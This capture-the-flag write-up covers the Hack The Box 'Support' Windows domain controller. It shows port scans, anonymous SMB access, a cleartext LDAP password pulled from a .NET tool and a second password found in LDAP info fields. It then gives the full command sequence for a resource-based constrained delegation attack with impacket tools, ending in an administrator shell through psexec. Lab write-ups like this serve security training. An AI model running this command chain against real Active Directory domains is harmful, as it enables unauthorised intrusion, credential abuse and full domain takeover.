# Support HTB

```
PORT     STATE SERVICE       VERSION
53/tcp   open  domain        Simple DNS Plus
88/tcp   open  kerberos-sec  Microsoft Windows Kerberos (server time: 2024-03-13 15:17:21Z)
135/tcp  open  msrpc         Microsoft Windows RPC
139/tcp  open  netbios-ssn   Microsoft Windows netbios-ssn
389/tcp  open  ldap          Microsoft Windows Active Directory LDAP (Domain: support.htb0., Site: Default-First-Site-Name)
445/tcp  open  microsoft-ds?
464/tcp  open  kpasswd5?
593/tcp  open  ncacn_http    Microsoft Windows RPC over HTTP 1.0
636/tcp  open  tcpwrapped
3268/tcp open  ldap          Microsoft Windows Active Directory LDAP (Domain: support.htb0., Site: Default-First-Site-Name)
3269/tcp open  tcpwrapped
Service Info: Host: DC; OS: Windows; CPE: cpe:/o:microsoft:windows

Host script results:
| smb2-time: 
|   date: 2024-03-13T15:17:24
|_  start_date: N/A
|_clock-skew: -22h27m54s
| smb2-security-mode: 
|   3:1:1: 
|_    Message signing enabled and required
```

Enumerating smb with `smbmap -u guest -H dc.support.htb` ![](https://2519178678-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FuE2sPgM0QY6KfiTIG8Vs%2Fuploads%2Fgit-blob-999745f376763e783344a8afbfa4844c47e75020%2F0eaa4c96ba9cc6c495d72e7a3b23f2c1.png?alt=media) We access the share with `smbclient \\\\dc.support.htb\\support-tools -N --no-pass` ![](https://2519178678-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FuE2sPgM0QY6KfiTIG8Vs%2Fuploads%2Fgit-blob-ce6c931c618ef2f92f3e2060f373ce03645d1579%2F1e4e24d5e0634cb95cc0acccac485a00.png?alt=media) Found an unusual app called UserInfo.exe so using mono to run it: ![](https://2519178678-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FuE2sPgM0QY6KfiTIG8Vs%2Fuploads%2Fgit-blob-05f5ffe69310cabe5cf68f63d4578236e034c1e3%2F0a59824e486b625a5f1c069d6492d0ec.png?alt=media) ![](https://2519178678-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FuE2sPgM0QY6KfiTIG8Vs%2Fuploads%2Fgit-blob-9228d4323443aa9d2ca1374fda59d6bcf825f113%2Fb7b10ace6a12bcb93b670ed4c5431082.png?alt=media) Using wireshark to sniff the packets or can use DNSpy as it is a .NET application we find: ![](https://2519178678-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FuE2sPgM0QY6KfiTIG8Vs%2Fuploads%2Fgit-blob-680569d1fa93c0fae24090eb97967ac5a8758186%2F0596661da7b2ef0dc532acb477335171.png?alt=media) Following to TCP stream: ![](https://2519178678-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FuE2sPgM0QY6KfiTIG8Vs%2Fuploads%2Fgit-blob-17fd1751173edab655b6125853dabba5761b92c9%2F40a14c2895e1383b1292a0046e31c265.png?alt=media) This appears to be a cleartext password for a user called ldap Trying the password with

```
cme smb 10.10.11.174 -u ldap -p "$nvEfEK16^1aM4$e7AclUf8x$tRWxPWO1%lmz"  
```

It doesnt work![](https://2519178678-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FuE2sPgM0QY6KfiTIG8Vs%2Fuploads%2Fgit-blob-23c5e0dbfcf9dcf9be0fd3f1538b1edfa75232a8%2F32b86ba267b37d2b66156fd739dfecfc.png?alt=media) But using single quotes and removing "$" makes it work. ![](https://2519178678-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FuE2sPgM0QY6KfiTIG8Vs%2Fuploads%2Fgit-blob-2d598906f473b5959ed1b4996eb99e03a8463560%2Ff9ae5235e9d403f553c4af5f1971f6e8.png?alt=media) Now using bloodhound to collect info

```
bloodhound.py -dns-tcp -u 'ldap' -p 'nvEfEK16^1aM4$e7AclUf8x$tRWxPWO1%lmz' -ns 10.10.11.174 -d support.htb -c all
```

We find almost nothing of value but the *support* user looks interesting

Now using ldapsearch

```
ldapsearch  -D 'ldap@support.htb' -w 'nvEfEK16^1aM4$e7AclUf8x$tRWxPWO1%lmz' -b "DC=support,DC=htb" -H ldap://support.htb > ldap.out
```

Now checking the info field in ldapsearch we find password for support:![](https://2519178678-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FuE2sPgM0QY6KfiTIG8Vs%2Fuploads%2Fgit-blob-230198677f50b7ac59ce6574a06e4349563498a2%2F3f4567f9d3d91506e4601a7d98ace517.png?alt=media) support:Ironside47pleasure40Watchful\`

Now we attack with the genericAll permission: Creating a machine account: `addcomputer.py -method SAMR -computer-name 'aditya' -computer-pass 'Aditya123@' -dc-host dc.support.htb -domain-netbios support.htb 'support.htb/support:Ironside47pleasure40Watchful'` Delegation from aditya to dc: `rbcd.py -delegate-from 'aditya$' -delegate-to 'dc$' -action 'write' 'support.htb/support:Ironside47pleasure40Watchful'` Now getting the ticket: `getST.py -spn 'www/dc.support.htb' -impersonate administrator 'support.htb/aditya$:Aditya123@'` Now to get a shell: `KRB5CCNAME=administrator.ccache psexec.py -dc-ip 10.10.11.174 support.htb/administrator@dc.support.htb -k -no-pass` ![](https://2519178678-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FuE2sPgM0QY6KfiTIG8Vs%2Fuploads%2Fgit-blob-faa237d29b15aea6ab5916c9e37b458d5754715b%2F6371698950c7a8efc5e46d6acb5c551a.png?alt=media)